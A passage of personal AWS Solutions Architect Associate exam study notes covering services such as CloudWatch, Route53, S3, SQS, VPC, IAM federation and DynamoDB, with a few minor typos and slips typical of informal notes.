    • Deploying a Lambda function in a public subnet does not give it internet access
    • Instead, you can deploy the Lambda function in a private subnet and give it internet access via a NAT Gateway / NAT Instance

Lambda Concurrency

  • Concurrency limit up to 1000 concurrent executions
  • each invocation over the concurrency limit will respond with a HTTP 429
  • Cold starts and provisioned concurrency
    • If the init is large, cold start could take a long time. This may cause the first request to have high latency than the rest
    • To resolve the cold start issue, you can use Provisioned concurrency
      • With Provisioned Concurrency, concurrency is allocated before the function is invoked

Lambda Containers

  • Deploy Lambda functions as container images up to 10GB from ECR

CloudTrail

Introduction

  • Internal monitors of API calls being made
  • Audit changes to AWS resources
  • Enabled by default
  • Event Types:
    • Management Events
    • Data Events
    • CloudTrail Insights Events
      • analyze events and try to detect unusual activity in your account
  • Event Retention
    • Events are stored by default for 90 days
    • To keep events beyond this period, log them to S3 and use Athena to analyze them

CloudWatch

Introduction

  • Metrics, Logs, Events, and Alarms

CloudWatch Metrics

  • CloudWatch provides metrics for every service in AWS
  • Metric is a variable to monitor (CPU Utilization, Network In, etc.)
  • Metrics belong to namespaces
  • Dimension is an attribute of a metric (instance id, environment, etc.)
  • Up to 30 dimensions per metric
  • Metrics have timestamp
  • You can create dashboards of metrics

EC2 Detailed Monitoring

  • By default, EC2 instance have metrics every 5 minutes
  • If you enable detailed monitoring, you can get metrics every 1 minute``
  • Use detailed monitoring if you want your ASG to scale faster
  • The AWS Free tier allows us to have 10 detailed monitoring metrics
  • EC2 memory usage is not pushed by default (you must push it from inside the instance as a custom metric)

CloudWatch Custom Metrics

  • You can define your own custom metrics
  • Use an API call PutMetricData

CloudWatch Logs

  • Define log groups, usually representing an application
  • Log Stream: instances within application /log files/ containers
  • You can define log expiration policies
  • You can send CloudWatch logs to
    • S3
    • Kinesis Data Streams
    • Kinesis Data Firehose
    • AWS Lambda
    • OpenSearch
  • Logs are encrypted by default

Log Sources

  • SDK, CloudWatch Logs Agent, CloudWatch Unified Agent

  • BeanStalk: Collection of logs from the application

  • ECS: Collection from containers

  • AWS Lambda: collection from function logs

  • VPC Flow Log’s

  • API Gateway

  • CloudTrail based on a filter

  • Route53

  • Use CloudWatch Logs Insights to query logs

CloudWatch Logs Subscriptions

  • Get a real-time log events from CloudWatch Logs for processing and analysis
  • Send to Kinesis Data Streams, Kinesis Data Firehose, or Lambda
  • Subscription Filter - filter which logs are events delivered to your destination

CloudWatch Alarms

  • Trigger notifications from any metric
  • Alarm States
    • Ok
    • Insufficient Data
    • Alarm
  • Targets
    • Actions on EC2 instances
    • Trigger autoscaling action
    • Send notification to SNS service
  • Composite Alarms monitor the state of multiple other alarms
    • AND and OR conditions

CloudWatch Synthetics Canary

  • Configurable script that can monitor your APIs, URLs, Websites, etc.
  • Reproduce what your customers do programmatically to find issues before customers are impacted
  • Blueprints
    • Heartbeat Monitor
    • API Canary
    • Broken Link Checker
    • Visual Monitoring
    • Canary Recorder
    • GUI Workflow Builder

Amazon Event Bridge

  • React to events. Examples:

    • EC2 Instance started
    • Codebuild failed build
    • S3 upload object
    • schedule a cronjob
    • CloudTrail API call
  • Event Buses can be accessed across AWS accounts using Resource-Based Policies
    • Resource policies allow you to manage permissions for an EventBus

x-ray

Introduction

  • Troubleshooting application performance and errors
  • Distributed tracing of Micro-services
  • Compatible with
    • Lambda
    • Beanstalk
    • ECS
    • ELB
    • API Gateway
    • EC2 instances or any on-premises app server
  • You can enable x-ray by:
    • Install the x-ray daemon (on a server) or enable x-ray integration (some AWS services such as lambda)
    • You can instrument x-ray in your code using the AWS SDK
      • python, java, go, .NET, node.js

X-Ray APIs

  • Writes
    • PutTraceSegments - Uploads a segment document int x-ray
    • PutTelemetryRecords - Used by the AWS X-Ray daemon o upload telemetry
    • GetSamplingRules - Retrieve all sampling rules
  • Reads
    • GetServiceGraph - main graph
    • BatchGetTraces - Retries a list of traces specified by Id
    • GetTraceSummaries - Retrieve Ids and annotations for traces available for a specified time frame using an optional filter
    • GetTraceGraph

X-Ray with Beanstalk

  • Beanstalk includes the x-ray daemon
  • You can run the daemon by setting an option in the Elastic Beanstalk console or with a configuration file (in .ebextensions/xray-daemon.confi)
    option_settings:
      aws:elasticbeanstalk:xray:
        XRayEnabled: true
    
  • Make sure to give your instance profile the correct IAM permissions so that the x-ray daemon can function correctly
  • You app code must still be instrumented with the X-Ray integration code

ECS + X-Ray

  • Pattens:
    • Run the X-Ray daemon container on every EC2 instance
    • Run the X-Ray container as a sidecar for the app containers (the only way to get ECS with Fargate working with X-Ray)

Aurora

Introduction

  • AWS propriety database technology compatible with Postgres and Mysql
  • 5x performance improvement over MySql, 3x performance improvement over Postgres
  • Storage automatically grows, starts at 10GB, grows up to 128 TB
  • Up to 15 read replicas, replication process is faster than MySql
  • Failover is instantaneous, HA is native to Aurora
  • About 25% more expensive than RDS

Aurora High Availability

  • 6 copies of your data across 3 AZ:
    • 4 copies out of 6 need to be available for writes
    • 3 copies out of 6 need to be available for reads
  • Self-healing with peer-to-peer replication
  • Stored is striped across 100 volumes
  • Only one instance will take writes at a time, failover within 30 seconds
    • You can optionally enable “Local Write Forwarding” to forward writes from a read replica to a write replica
  • Supports cross region replication
  • Reader endpoint is load balanced across all read replicas. Writer endpoint points to the current writer instance

Aurora Security

  • If the master is not encrypted, read replicas cannot be encrypted
  • To encrypt an unencrypted database, create a db snapshot and restore as encrypted

RDS (Relational Database Service)

Introduction

  • Fully managed relational database service
    • Automated provisioning and maintenance
    • Full backups and point in time restore
  • Monitoring dashboards
  • Multi AZ setup for DR
  • Read replicas for improved performance
  • Storage backed by EBS
  • Vertical and horizontal scaling
  • Supports
    • Postgres
    • MySql / MariaDB
    • Oracle
    • IBM DB2
    • MSSQL
    • Aurora (Postgres and MySQL)
  • You cannot SSH or access the underlying database compute instance
  • Storage auto-scaling

Read replicas

  • Scale out database reads
    • read replicas only support select statements
  • Improves performance for reads
  • You can create up to 15 read replicas in the same AZ, cross AZ, or cross region
  • Asynchronous replication, reads are eventually consistent
  • You can promote a read replica to a full read/write instance
  • Apps must update the connection string to use a read replica
  • Network costs
    • If the replica is in the same region, there is no fee for network traffic
    • Cross region replicas will cost you for replication traffic

RDS Proxy

  • Fully managed database proxy for RDS
  • Allow apps to pool and share DB connections established with the database
  • Improves database efficiency by reducing stress on the database resources by pooling connections at the proxy
  • Serverless, autoscaling, HA
  • Reduced RDS and Aurora failover time by up to 66%
  • RDS proxy is only accessible from within the VPC, it is never publicly accessible
  • RDS proxy is particularly helpful when you have auto-scaling lambda functions connecting to your database

Route53

Introduction

  • A highly available, fully managed, scalable, authoritative DNS service provided by Amazon
  • Also a domain registrar
  • Supports health checks for resources registered with DNS names
  • The only AWS service that provides 100% availability

Hosted Zones

  • Public Hosted Zones
  • contains records that specify how to route traffic on the internet
  • Private Hosted Zones
  • Only hosts within the VPC can resolve the DNS names
  • You will pay 50 cents per month for each hosted zone
  • Domain names will cost you $12/year

TTL

  • Time to live
  • i.e. how long a DNS record will be cached on a client machine

CNAME vs Alias

  • lb l-1234.us-east-2.elb.amazonaws.com and you want myapp.mydomain.com
  • CNAME:
  • Points a hostname to any other hostname (app.domain.com => blabla.anything.com)
  • You cannot create a CNAME for the Apex record (root domain)
  • Alias:
  • Points a hostname to an AWS Resource (app.mydomain.com => blabla.amazonaws.com)
  • WORKS for ROOT DOMAIN and NON ROOT DOMAIN (aka, mydomain.com)
    • Free of charge
    • Native health check
    • Only supported for A and AAAA record types
    • Cannot set alias for an EC2 instance name

Routing Policies

  • Simple

    • Typically, the simple type of routing policy will resolve to a single resource
    • If the record resolves to multiple values, the client will choose a random one
    • When using the Alias record type, the record can only resolve to one resource
  • Weighted

    • Control the % of the requests that go to each specific resource.
    • Assign each record a relative weight
      • $ \text traffic {(%)} = {\displaystyle \text {weight for a specific record } \over \displaystyle \text {sum of all the weights for all records }} $
      • The sum of the weights of all records does not need to equal 100
    • DNS records must have the same name and type
    • Can be associated with Health Checks
    • Use cases: load balancing between regions, testing new application versions
  • Latency

    • Redirect to the resource that has the least latency close to us
    • Super helpful when latency for users is a priority
    • Latency is based on traffic between users and AWS Regions
    • Germany users may be directed to the US (if that’s the lowest latency)
    • Can be associated with Health Checks (has a failover capability)
  • Failover

  • Geolocation

    • Different from latency based
    • This routing is based on user location
    • Should create a “Default” record (in case there’s no match on location)
    • Use cases: website localization, restrict content distribution, load balancing
    • Can be associated with Health Checks
  • Geoproximity

    • Route traffic to your resources based on the location of users and resources
    • Ability to shift more traffic to resources based on the defined bias
    • To change the size of the geographic region, specify bias values:
      • To expand (1 to 99)- more traffic to the resource
      • To shrink (-1 to 99)- less traffic to the resource
    • Resources can be:
      • AWS resources (specify AWS region)
      • Non-AWS resources (specify Latitude and Longitude)
    • You must use Route 53 Traffic Flow to use this feature
  • Health Checks

    • HTTP Health Checks are only for public resources. You must create a CloudWatch Metric and associate a CloudWatch Alarm, then create a Health Check that checks the alarm
    • 15 global health checkers
    • Health checks methods:
      • Monitor an endpoint
        • Healthy/unhealthy threshold - 3 (default)
        • Interval 30 seconds
        • Supports HTTP, HTTPS, and TCP
        • if > 18% of health checkers report the endpoint is healthy, Route53 considers it healthy.
        • You can choose which locations you want Route53 to use
        • You must configure the firewall to allow traffic from the health checkers
      • Calculated Health Checks
        • Combine the results of multiple health checks into a single health check

Configuring Amazon Route 53 to route traffic to an S3 Bucket

  • An S3 bucket that is configured to host a static website
    • You can route traffic for a domain and its subdomains, such as example.com and www.example.com to a single bucket.
    • Choose the bucket that has the same name that you specified for Record name
    • The name of the bucket is the same as the name of the record that you are creating
    • The bucket is configured as a website endpoint

S3

Introduction

  • Storage
  • Files are stored in Buckets, the files are called objects
  • Storage Accounts must have a globally unique DNS name
  • Buckets are regional
  • Bucket names must have no uppercase, no underscore, 3-63 characters long, not an IP address, must start with a lowercase letter or number
  • Objects (files) have a key, which is the FULL path of the object:
    • Example of a prefix
      • bucket/folder1/subfolder1/mypic.jpg => prefix is /folder1/subfolder1/
  • S3 Select
    • Use SQL like language to only retrieve the data you need from S3 using server-side filtering
  • Max object size is 5TB
  • If you upload a file larger than 5GB, you must use Multi-part Upload
  • Objects can have metadata

S3 Security

  • User-Based

    • IAM Policies - Which API calls are allowed for an IAM user
  • Resource-Based

    • Bucket Policies- bucket wide rules form the S3 Console - allows cross account
    • Object ACL - Finer grained (can be disabled)
    • Bucket ACL - less common (can be disabled)
  • An IAM Principal can access an S3 object if:

    • The user IAM permissions ALLOW it OR the resource policy allows it and there is no explicit Deny
  • Bucket Policies - Bucket wide rules from the S3 console

    • JSON based policy

        {
            "Version": "2012-10-17",
            "Statement": [{
                "Sid": "AllowGetObject",
                "Principal": {
                    "AWS": "*"
                },
                "Effect": "Allow",
                "Action": "s3:GetObject",
                "Resource": "arn:aws:s3:::DOC-EXAMPLE-BUCKET/*",
                "Condition": {
                    "StringEquals": {
                        "aws:PrincipalOrgID": ["o-aa111bb222"]
                    }
                }
            }]
        }
      
    • You can use the AWS Policy Generator to create JSON policies

S3 Static Website Hosting

  • You must enable public reads on the bucket

S3 Versioning

  • allows to version the object

  • Stores all versions of an object in S3

  • Once enabled it cannot be disabled, only suspended on the bucket

  • Fully integrates with S3 Lifecycle rules

  • MFA Delete feature provides extra protection against deletion of your data

S3 Cross-Region Replication or Same-Region Replication

  • When enabled, any object that is uploaded will be Automatically replicate to another region or from source to destination buckets

  • Must have versioning turned on both the source and destination buckets.

  • Can have CRR replicate to another AWS account

  • Replicate objects within the same region

  • You must give proper IAM permissions to S3

  • Buckets can be in different AWS accounts

  • Only new objects are replicated after enabling replication. To replicate existing objects, you must use S3 Batch Replication

  • For DELETE operations, you can optionally replicate delete markers. Delete Markers are not replicated by default.

  • To replicate, you create a replication rule in the “Management” tab of the S3 bucket. You can choose to replicate all objects in the bucket, or create a rule scope

S3 Storage Classes

  • AWS offers a range of S3 Storage classes that trade Retrieval, Time, Accessability and Durability for Cheaper Storage

(Descending from expensive to cheaper)

  • S3 Standard (default)

    • Fast! 99.99 % Availability,
    • 11 9’s Durability. If you store 10,000,000 objects on S3, you can expect to lose a single object once every 10,000 years
    • Replicated across at least three AZs
      • S3 standard can sustain 2 concurrent facility failures
  • S3 Intelligent Tiering

    • Uses ML to analyze object usage and determine the appropriate storage class
    • Data is moved to most cost-effective tier without any performance impact or added overhead
  • S3 Standard-IA (Infrequent Access)

    • Still Fast! Cheaper if you access files less than once a month
    • Additional retrieval fee is applied. 50% less than standard (reduced availability)
    • 99.9% Availability
  • S3 One-Zone-IA

    • Still fast! Objects only exist in one AZ.
    • Availability (is 99.5%). but cheaper than Standard IA by 20% less
    • reduces durability
    • Data could be destroyed
    • Retrieval fee is applied
  • S3 Glacier Instant Retrieval

    • Millisecond retrieval, great for data accessed once a quarter
    • Minimum storage duration of 90 days
  • S3 Glacier Flexible Retrieval

    • data retrieval: Expedited (1 to 5 minutes), Standard (3 to 5 hours), Bulk (5 to 12 hours) - free
    • minimum storage duration is 90 days
    • Retrieval of data can take minutes to hours but the off is very cheap storage
  • S3 Glacier Deep Archive

    • The lowest cost storage class - Data retrieval time is 12 hours
    • standard (12 hours), bulk (48 hours)
    • Minimum storage duration is 180 days
  • S3 Glacier Intelligent Tiering


  • Storage class comparison

  • S3 Guarantees:

    • Platform is built for 99.99% availability
    • Amazon guarantee 99.99% availability
    • Amazon guarantees 11’9s of durability

S3 LifeCycle Rules

  • Types of rules:
    • Transition Actions
      • Move objects between storage classes automatically
    • Expiration Actions
      • Configure objects to expire (delete) after some time
      • Can be used to delete incomplete multi-part uploads
      • Delete access logs automatically
      • Can be used to delete old versions of files if versioning is enabled
  • Rules can be specified for objects with a certain prefix or tag

Event Notifications

  • Examples of events:
    • S3:ObjectCreated, S3:ObjectRemoved, S3:ObjectRestore
  • Object name filtering is possible (*.jpg for example)
  • Send a notification when an event occurs
  • Uses SNS, Lambda, or SQS to send the notifications to
    • Requires a SNS Resource Policy, SQS Resource Policy, or a Lambda Resource Policy allowing S3 bucket to write to the resource
  • You can also send events to EventBridge, which can then be used to send the events to 18 other AWS services

S3 Encryption

  • 4 types of encryption in S3
    • Server side encryption with managed keys (SSE-S3)
      • Key is completely managed by AWS, you never see it
      • Object is encrypted server-side
      • Enabled by default
        • Uses AES-256, must set header "x-amz-server-side-encryption": "AES256"
    • Server side encryption with KMS keys stored in AWS KMS (SSE-KMS)
      • Manage the key yourself, store the key in KMS
      • You can audit the key use in CloudTrail
        • Uses AES-256, must set header "x-amz-server-side-encryption": "AWS:KMS"
      • Accessing the key counts toward your KMS Requests quota (5500, 10000, 30000 rps, based on region)
        • You can request a quota increase from AWS
    • Server Side Encryption with customer provided keys (SSE-C)
      • Can only be enabled/disabled from the AWS CLI
      • AWS doesn’t store the encryption key you provide
      • The key must be passed as part of the headers with every request you make
      • HTTPS must be used
    • CSE (Client side encryption)
      • Clients encrypt/decrypt all the data before sending any data to S3
      • Customer fully managed the keys and encryption lifecycle
  • Encryption in Transit
    • Traffic between local host and S3 is achieved via SSL/TLS

MFA Delete

  • MFA Delete ensures users cannot delete objects from a bucket unless they provide their MFA code.
  • MFA delete can only be enabled under these conditions
    1. The AWS CLI must be used to turn on MFA delete
    2. The bucket must have versioning enabled
  • Only the bucket owner logged in as Root User can DELETE objects from bucket

Presigned URLs

  • Generates a URL which provides temporary access to an object to either upload or download object data.

  • The pre-signed URL inherites the permission of the user that created the pre-signed URL

  • Presigned Urls are commonly used to provide access to private objects

  • Can use AWS CLI or AWS SDK to generate Presigned Urls

  • If in case a web-application which need to allow users to download files from a password protected part of the web-app. Then the web-app generates presigned url which expires after 5 seconds. The user downloads the file.

Simple Notification System

Introduction

  • Pub/sub system
  • The “event producer” only sends messages to one SNS topic
  • As many subscribers as we want to listen to the SNS topic notifications
  • Each subscriber to the topic will get all of the messages (new feature to filter messages)
  • Up to 12,500,000 subscriptions per topic
  • 100,000 topic limit
  • Subscribers can be:
    • SQS, Lambda, Kinesis Data Firehose, Emails, SMS, etc.
  • Publishers can be:
    • CloudWatch, Budgets, S3 Event Notifications, any many more…

How to publish

  • Topic Publish (using the SDK)
    • Create a topic
    • Create a subscription (or many)
    • Publish to the topic
  • Direct Publish (for mobile apps SDK)
    • Create a platform application
    • Create a platform endpoint
    • Publish to the platform endpoint
    • Works with Google GCM, Apple APNS, Amazon ADM, etc.

SNS + SQS: Fan Out

  • Concept: Push once in SNS, receive in all SQS queues that are subscribers

Simple Queue System

Introduction

  • When you deploy an application, it will communicate in one of two ways
    • Synchronous: Applications talk directly to each other
    • Asynchronous: Applications use some type of ‘middle-man’ to communicate, such as a queue
  • A queue can have multiple producers and multiple consumers
  • SQS offers unlimited throughput and unlimited messages, with less than 10 ms latency
  • SQS is the oldest service provided by AWS
  • The default TTL of a message in the queue is 4 days and the maximum is 14 days
  • Messages must be less than 256 KB
  • SQS can have duplicate messages and messages may be delivered out of order

Producing Messages

  • Messages are sent to SQS using the SendMessage API
  • The message is persisted until a consumer deletes it, unless the TTL expires

Consuming Messages

  • An application you write. Can be hosted anywhere (AWS, on-prem, etc.)
  • The consumer will poll the queue for new messages and receive up to 10 messages at a time
  • Consumers need to delete messages after processing them, otherwise other consumers may receive the messages
  • You can create a EC2 ASG to pull the CloudWatch Metric “Queue Length” and scale in/out based on the value of the metric
    • This metric value is the number of messages in a queue

SQS Queue Access Policy

  • You can allow an EC2 instance in a different AWS account to access a queue using an SQS access policy
  • You can use an access policy to allow an S3 bucket to write to an SQS queue using Event Notifications

Message Visibility Timeout

  • After a message is polled by a consumer, it becomes invisible to other consumers
  • By default, the message is invisible to other consumers for 30 seconds
  • If a message is not processed within the visibility timeout, it may be processed twice. Your application can change this behavior by calling the ChangeMessageVisibility API

Dead letter Queues

  • If a consumer fails to process a message within the Visibility Timeout, the message goes back to the queue.
  • We can set a threshold of how many times the message can go back into the queue
  • After the MaximumRecieves threshold is exceeded, the message goes into a dead letter queue (DLQ)
  • The Dead letter queue of a FIFO queue must also be a FIFO queue
  • The dead letter queue of a standard queue must also be a standard queue

FIFO Queues

  • First in, first out
  • Messages are ordered in the queue, first message to arrive is the first message to leave
  • The name of the queue must end in ‘.fifo’
  • De-duplication
    • default de-duplication interval is 5 minutes
    • Two de-duplication methods:
      • Content based de-duplication: will hash the message body and compare
      • Explicitly provide a Message De-duplication Id
  • Message Grouping

VPC

Introduction

  • VPC is a private network within AWS
  • VPC’s can contain one or more subnets
  • A public subnet is a subnet that is accessible from the internet
  • To define access to the internet and between subnets, use route tables

Internet Gateway and NAT Gateway

  • Internet gateways help the VPC connect to the internet
  • Public subnets have a route to the internet gateway
  • NAT gateways and NAT instances (self-managed) allow your instances in your private subnet to access the internet while remaining private

Network ACL and Security Groups

  • NACL is a firewall rule list which allows or denies traffic to and from a subnet
  • NACL’s are attached at the subnet level
  • NACL’s are stateless, meaning an inbound rule needs to have a matching outbound rule
  • Security groups are a firewall rule list that controls traffic to and from an EC2 instance
  • Security groups can only contain allow rules
  • Security group rules can contain IP addresses/ranges or other Security Groups

VPC Flow Logs

  • Flow logs log traffic into a VPC, subnet, or Elastic Network Interface
  • 3 Types of flow logs
    • VPC Flow Logs
    • Subnet Flow Logs
    • ENI Flow Logs
  • Log data can be sent to S3, CloudWatch Logs, and Kinesis Data Firehouse

VPC Peering

  • Connect two VPC, privately over the AWS backbone network
  • The two VPCs must not have overlapping CIDR blocks
  • VPC peering is not transitive

VPC Endpoints

  • Endpoints allow you to connect to AWS Services using a private network instead of the public network
  • Gives you enhanced security and lower latency accessing AWS services

Site to Site VPC

  • Establish a physical connection between AWS and on-premises
  • Goes over the public internet

Direct Connect

  • Establish a physical connection between AWS and on-premises
  • Goes over a private network
  • Requires infrastructure to be put in place

AWS-Solutions-Architect-Associate-notes

This is a collection of study material and follows through guidelines of the AWS Certified Solutions Architect - Associate exam (SAA-C03) exam.

Exam Guide

Domain% of Exam
Domain 1: Design Secure Architectures30%
Domain 2: Design Resilient Architectures26%
Domain 3: Design High-Performing Architectures24%
Domain 4: Design Cost-Optimized Architectures20%
TOTAL100%

Directory Map

Table of Contents

CheatSheets

AWS Certified Solutions Architect Associate Practice Exams

Metadata

  • Title: AWS Certified Solutions Architect Associate Practice Exams
  • URL: https://www.udemy.com/course/aws-certified-solutions-architect-associate-amazon-practice-exams-saa-c03/learn/quiz/4394972/result/1100741372

Highlights & Notes

  • In Auto Scaling, the following statements are correct regarding the cooldown period: It ensures that the Auto Scaling group does not launch or terminate additional EC2 instances before the previous scaling activity takes effect. Its default value is 300 seconds. It is a configurable setting for your Auto Scaling group.

  • You can use Amazon Data Lifecycle Manager (Amazon DLM) to automate the creation, retention, and deletion of snapshots taken to back up your Amazon EBS volumes. Automating snapshot management helps you to: - Protect valuable data by enforcing a regular backup schedule. - Retain backups as required by auditors or internal compliance. - Reduce storage costs by deleting outdated backups.

  • AWS Global Accelerator and Amazon CloudFront are separate services that use the AWS global network and its edge locations around the world. CloudFront improves performance for both cacheable content (such as images and videos) and dynamic content (such as API acceleration and dynamic site delivery). Global Accelerator improves performance for a wide range of applications over TCP or UDP by proxying packets at the edge to applications running in one or more AWS Regions. Global Accelerator is a good fit for non-HTTP use cases, such as gaming (UDP), IoT (MQTT), or Voice over IP, as well as for HTTP use cases that specifically require static IP addresses or deterministic, fast regional failover. Both services integrate with AWS Shield for DDoS protection.

  • A Gateway endpoint is a type of VPC endpoint that provides reliable connectivity to Amazon S3 and DynamoDB without requiring an internet gateway or a NAT device for your VPC. Instances in your VPC do not require public IP addresses to communicate with resources in the service.

  • AWS DataSync makes it simple and fast to move large amounts of data online between on-premises storage and Amazon S3, Amazon Elastic File System (Amazon EFS), or Amazon FSx for Windows File Server. Manual tasks related to data transfers can slow down migrations and burden IT operations. DataSync eliminates or automatically handles many of these tasks, including scripting copy jobs, scheduling, and monitoring transfers, validating data, and optimizing network utilization. The DataSync software agent connects to your Network File System (NFS), Server Message Block (SMB) storage, and your self-managed object storage, so you don’t have to modify your applications. DataSync can transfer hundreds of terabytes and millions of files at speeds up to 10 times faster than open-source tools, over the Internet or AWS Direct Connect links. You can use DataSync to migrate active data sets or archives to AWS, transfer data to the cloud for timely analysis and processing, or replicate data to AWS for business continuity. Getting started with DataSync is easy: deploy the DataSync agent, connect it to your file system, select your AWS storage resources, and start moving data between them. You pay only for the data you move.

  • Here is a list of important information about EBS Volumes:

    • When you create an EBS volume in an Availability Zone, it is automatically replicated within that zone to prevent data loss due to a failure of any single hardware component.

    • An EBS volume can only be attached to one EC2 instance at a time.

    • After you create a volume, you can attach it to any EC2 instance in the same Availability Zone

    • An EBS volume is off-instance storage that can persist independently from the life of an instance. You can specify not to terminate the EBS volume when you terminate the EC2 instance during instance creation.

    • EBS volumes support live configuration changes while in production which means that you can modify the volume type, volume size, and IOPS capacity without service interruptions.

    • Amazon EBS encryption uses 256-bit Advanced Encryption Standard algorithms (AES-256)

    • EBS Volumes offer 99.999% SLA.

Table of Contents

Table of Contents

Amazon EBS


  • Amazon EBS provides three volume types to best meet the needs of your workloads:

    • General Purpose (SSD)
      • General Purpose (SSD) volumes are suitable for a broad range of workloads, including small to medium-sized databases, development and test environments, and boot volumes.
    • Provisioned IOPS (SSD)
      • These volumes offer storage with consistent and low-latency performance and are designed for I/O intensive applications such as large relational or NoSQL databases.
    • Magnetic
      • for workloads where data are accessed infrequently, and applications where the lowest storage cost is important.
  • Here is a list of important information about EBS Volumes:

    • When you create an EBS volume in an Availability Zone, it is automatically replicated within that zone to prevent data loss due to a failure of any single hardware component.

    • An EBS volume can only be attached to one EC2 instance at a time.

    • After you create a volume, you can attach it to any EC2 instance in the same Availability Zone

    • An EBS volume is off-instance storage that can persist independently from the life of an instance. You can specify not to terminate the EBS volume when you terminate the EC2 instance during instance creation.

    • EBS volumes support live configuration changes while in production which means that you can modify the volume type, volume size, and IOPS capacity without service interruptions.

    • Amazon EBS encryption uses 256-bit Advanced Encryption Standard algorithms (AES-256)

    • EBS Volumes offer 99.999% SLA. This

Cloudwatch


  • Monitoring tool for your AWS resources and applications.
  • Display metrics and create alarms that watch the metrics and send notifications or automatically make changes to the resources you are monitoring when a threshold is breached.

AWS Identity and Access Management


  • You should always associate IAM role to EC2 instances not IAM user for the purpose of accessing other AWS services

  • IAM roles are designed so that your application can securely make API requests from your instances, without requiring you to manage the security credentials that the application use.

    • Instead of creating and distributing your AWS credentials, you can delegate permission to make API requests using IAM roles
  • AWS Organization is a service that allows you to manage multiple AWS accounts easily.

  • AWS IAM Identity Center can be integrated with your corporate directory service for centralized authentication.

    • This means you can sign in to multiple AWS accounts with just one set of credentials.
    • This integration helps to streamline the authentication process and makes it easier for companies to switch between accounts.
  • SCP you can also configure a service control policy (SCP) to manage your AWS accounts.

    • SCPs help you enforce policies across your organization and control the services and features accessible to your other account.
    • prevents unauthorized access
  • Security Token Service (STS) is the service that you can use to create and provide trusted users with temporary security credentials that can control access to your AWS resources.

    • Temporary security credentials work almost identically to the long-term access key credentials that your IAM users can use.
  • AWS Control Tower provides a single location to easily set up your new well-architected multi-account environment and govern your AWS workloads with rules for security,operations, and internal compliance.

    • You can automate the setup of your AWS environment with best-practices blueprints for multi-account structure, identity, access management, and account provisioning workflow.
    • offers “guardrails” for ongoing governance of your AWS environment.
  • You can use an IAM role to specify permissions for users whose identity is federated from your organization or a third-party identity provider (IdP).

    • Federating users with SAML 2.0
      • If your organization already uses an identity provider software package that supports SAML 2.0 (Security Assertion Markup Language 2.0), you can create trust between your organization as an identity provider (IdP) and AWS as the service provider.
      • You can then use SAML to provide your users with federated single-sign on (SSO) to the AWS Management Console or federated access to call AWS API operations.
      • For example: if your company uses Microsoft Active Directory and Active Directory Federation Services, then you can federate using SAML 2.0
    • Federating users by creating a custom identity broker application
      • If your identity store is not compatible with SAML 2.0, then you can build a custom identity broker application to perform a similar function.

      • The broker application authenticates users, requests temporary credentials for users from AWS, and then provides them to the user to access AWS resources.

      • The application verifies that employees are signed into the existing corporate network’s identity and authentication system, which might use LDAP, Active Directory, or another system. The identity broker application then obtains temporary security credentials for the employees.

      • To get temporary security credentials, the identity broker application calls either AssumeRole or GetFederationToken to obtain temporary security credentials, depending on how you want to manage the policies for users and when the temporary credentials should expire.

      • The call returns temporary security credentials consisting of an AWS access key ID, a secret access key, and a session token. The identity broker application makes these temporary security credentials available to the internal company application.

      • This scenario has the following attributes:

        • The identity broker application has permissions to access IAM’s token service (STS) API to create temporary security credentials.

        • The identity broker application is able to verify that employees are authenticated within the existing authentication system.

        • Users are able to get a temporary URL that gives them access to the AWS Management Console (which is referred to as single sign-on).

RDS


  • Supports Aurora, MySQL, MariaDB, PostgreSQL, Oracle, Microsoft SQL Server.
  • DB Instance
    • For production OLTP use cases, use Multi-AZ deployments for enhanced fault tolerance with Provisioned IOPS storage for fast and predictable performance.
      • You can use PIOPS storage with Read Replicas for MySQL, MariaDB or PostgreSQL.
    • Magnetic
      • Doesn’t allow you to scale storage when using the SQL Server database engine.
        • Doesn’t support elastic volumes.
        • Limited to a maximum size of 3 TiB.
        • Limited to a maximum of 1,000 IOPS.
  • RDS automatically performs a failover in the event of any of the following:
    1. Loss of availability in primary Availability Zone.
    2. Loss of network connectivity to primary.
    3. Compute unit failure on primary.
    4. Storage failure on primary.

Athena


  • An interactive query service that makes it easy to analyze data directly in Amazon S3 and other data sources using SQL.
  • Serverless
  • Has a built-in query editor.
  • highly available and durable
  • integrates with Amazon QuickSight for easy data visualization.
  • retains query history for 45 days.
  • You pay only for the queries that you run. You are charged based on the amount of data scanned by each query.
  • There are 2 types of cost controls:
    • Per-query limit
      • specifies a threshold for the total amount of data scanned per query.
      • Any query running in a workgroup is canceled once it exceeds the specified limit.
      • Only one per-query limit can be created
    • Per-workgroup limit
      • this limits the total amount of data scanned by all queries running within a specific time frame.

Kinesis


  • A fully managed AWS service that you can use to stream live video from devices to the AWS Cloud, or build applications for real-time video processing or batch-oriented video analytics.
  • Amazon Kinesis Data Streams enables real-time processing of streaming big data. It provides ordering of records, as well as the ability to read and/or replay records in the same order to multiple Amazon Kinesis Applications
  • A Kinesis data stream is a set of shards that has a sequence of data records , and each data record has a sequence number that is assigned by Kinesis Data Streams.
    • Kinesis can also easily handle the high volume of messages being sent to the service.
    • durable
    • no missing of messages

DynamoDB

  • How to choose the right partition key ?

    • What is partition key ?
      • DynamoDB supports 2 types of primary keys
        • Partition key: A simple primary key, composed of one attribute known as the partition key.
        • Partition key and Sort key: Referred to as Composite Primary Key, this type of key is composed of two attributes. 1st one is partition key and 2nd one is sort key
    • Why do I need a partition key?
      • DynamoDb stores data as groups of attributes, - Items
      • Items are similar to rows or records in other database systems.
      • DynamoDB stores and retrieves each item based on the primary key value which must be unique
      • DynamoDb uses the partition key’s value as an input to an internal hash function. The output from the hash function determines the partition in which the item is stored. Each item’s location is determined by the hash value of its partition key.
    • DynamoDB automatically supports access patterns using the throughput you have provisioned, or upto your account limits in the on-demand mode
    • Regardless of the capacity mode you choose if your access pattern exceeds 3000 RCU and 1000 WCU for a single partition key value, your requests might be throttled with a ProvisionedThroughputExceededException error
    • Recommended for Partition keys :
      • Use high-cardinality attributes. These are attributes that have distinct values for each item, like emailid, employee_no, customerid, sessionid, orderid
      • Use composite attributes Try to combine more tha one attribute to form a unique key, if that meets your access pattern
      • Cache the popular items when there is high volume of read traffic using DAX (DynamoDB Accelerator)
      • DAX is fully managed, in-memory cache for DynamoDB that doesn’t require developers to manage cache invalidation, data population or cluster management.
      • DAX also is compatible with DynamoDB API calls, so developer can incorporate it more easily into existing applications

Storage Gateway


  • Connects an on-premise software appliance with cloud-based storage to provide seamless integration with data security features between your on-premises IT environment and the AWS storage infrastructure.

  • You can use the service to store data in the AWS cloud for scalable and cost-effective storage that helps maintain

